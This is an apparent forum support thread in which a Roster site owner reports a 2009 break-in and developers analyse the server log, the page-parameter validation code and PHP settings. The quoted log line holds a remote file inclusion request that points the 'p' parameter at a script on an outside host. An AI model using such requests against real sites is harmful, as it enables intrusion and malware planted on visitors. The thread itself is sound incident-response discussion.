Hello guys.

The last month I've been atacked by someone accessing to my server by the roster.

I've been speaking with my server support and they sent me the log.
Here is the next:

89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"

Someone could access to my files and change all the "index.*" adding a hidden iframe. This iframe install a trojan in your system opening pop-ups continuesly in every web site you visit.
Not only that, if not that the pop-ups install new trojans more dangerous than the first one. My updated antivirus (McAffee Virusscan didn't detect them).
In fact I got a trojan who accessed to my router and changed my DNS servers at the end.
You can imagind what will happend if it happends in a house where they don't know about computers.

Be carefull with that and just find a solution for stop this ilegal access.

Roster doesn't accept any characters for the p value from the URL except a-z 1-9 _ -

Roster dies and outputs an invalid message

Code: Select all

        // cmslink function to resolve SEO linking etc.
        parse_params();

        // --[ Determine the module request ]--
        if( isset($_GET[ROSTER_PAGE]) && !empty($_GET[ROSTER_PAGE]) )
        {
            $page = $_GET[ROSTER_PAGE];
        }
        elseif( !strpos($this->config['default_page'], '&') )
        {
            $page = $this->config['default_page'];
        }
        else
        {
            // --[ Insert directly into GET request ]--
            list($page, $gets) = explode('&',$this->conf['default_page'],2);
            foreach( explode('&',$gets) as $get )
            {
                list($key, $value) = explode('=',$get,2);
                $_GET[$key] = $value;
            }
        }

        define('ROSTER_PAGE_NAME', $page);

        $this->pages = explode('-', $page);

        // --[ We only accept certain characters in our page ]--
        if( preg_match('/[^a-zA-Z0-9_-]/', ROSTER_PAGE_NAME) )
        {
            roster_die($this->locale->act['invalid_char_module'],$this->locale->act['roster_error']);
        } 

I would like to know any more information you have about this

That's everything they could tell me.
I asked them about more information, but they only found that.

I was checking more information about this kind of attack, and it seems there is the possibility about you can get a trojan or something in your computers that can find your FTP passwords and access to your server infecting so many files as it want.

I will continue asking to my support for find more information about it.

Thank you anyway, I'll give you news.

I can't find any code that is likely to cause the bug before the code zanix pasted. It could be an issue in the preg_match in zanix' snippet, in which case it is a PHP bug. For any others looking into this:

Code: Select all

89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"

The columns are, as far as I can make out:
IP address

Code: Select all

89.108.73.84

unknown

Code: Select all

-

unknown

Code: Select all

-

Timestamp

Code: Select all

[08/Apr/2009:17:26:49 +0200]

Method

Code: Select all

GET

URL path

Code: Select all

/roster/index.php?p=http://www.wizard.com.br/id.txt???

Note: The last 3 question marks are likely to be substituted control codes

Protocol

Code: Select all

HTTP/1.1

Return status

Code: Select all

200

Normal. Indicates the webserver thinks the request was completed successfully. Roster unfortunately does not exit with a special exit status in case of errors (Because IIS servers then substitute their own error page rather than the one the PHP script returns).

Unknown, but probably VHost

Code: Select all

herederosdethrall.es

unknown

Code: Select all

-

User-Agent

Code: Select all

Mozilla /5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6

Suggests an ancient firefox (1.0.6) on a Mac. Likely to be faked. I haven't checked if that firefox version really returns that user agent.

unknown

Code: Select all

-

I'm not sure what the first two or the last dash mean. The one between vhost and user agent I suspect to be referer, from my own webserver logs.

Oh, and can you please post:

- OS, with version
- HTTP server, with version
You can find this information in rosterdiag under 'Basic server info'

- PHP version
- Whether the safe_mode, open_basedir, allow_url_fopen, and file_upload settings are on or off.
You can find this information in rosterdiag under 'PHP Settings'

Here it is...

Basic Server Info
OS Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux
Server Software Apache
MySQL Version 5.0.67-log

PHP Settings
PHP Version 5.2.9
PHP API Type cgi
safe_mode Off
open_basedir Off
allow_url_fopen Off
file_uploads On
upload_max_filesize 20M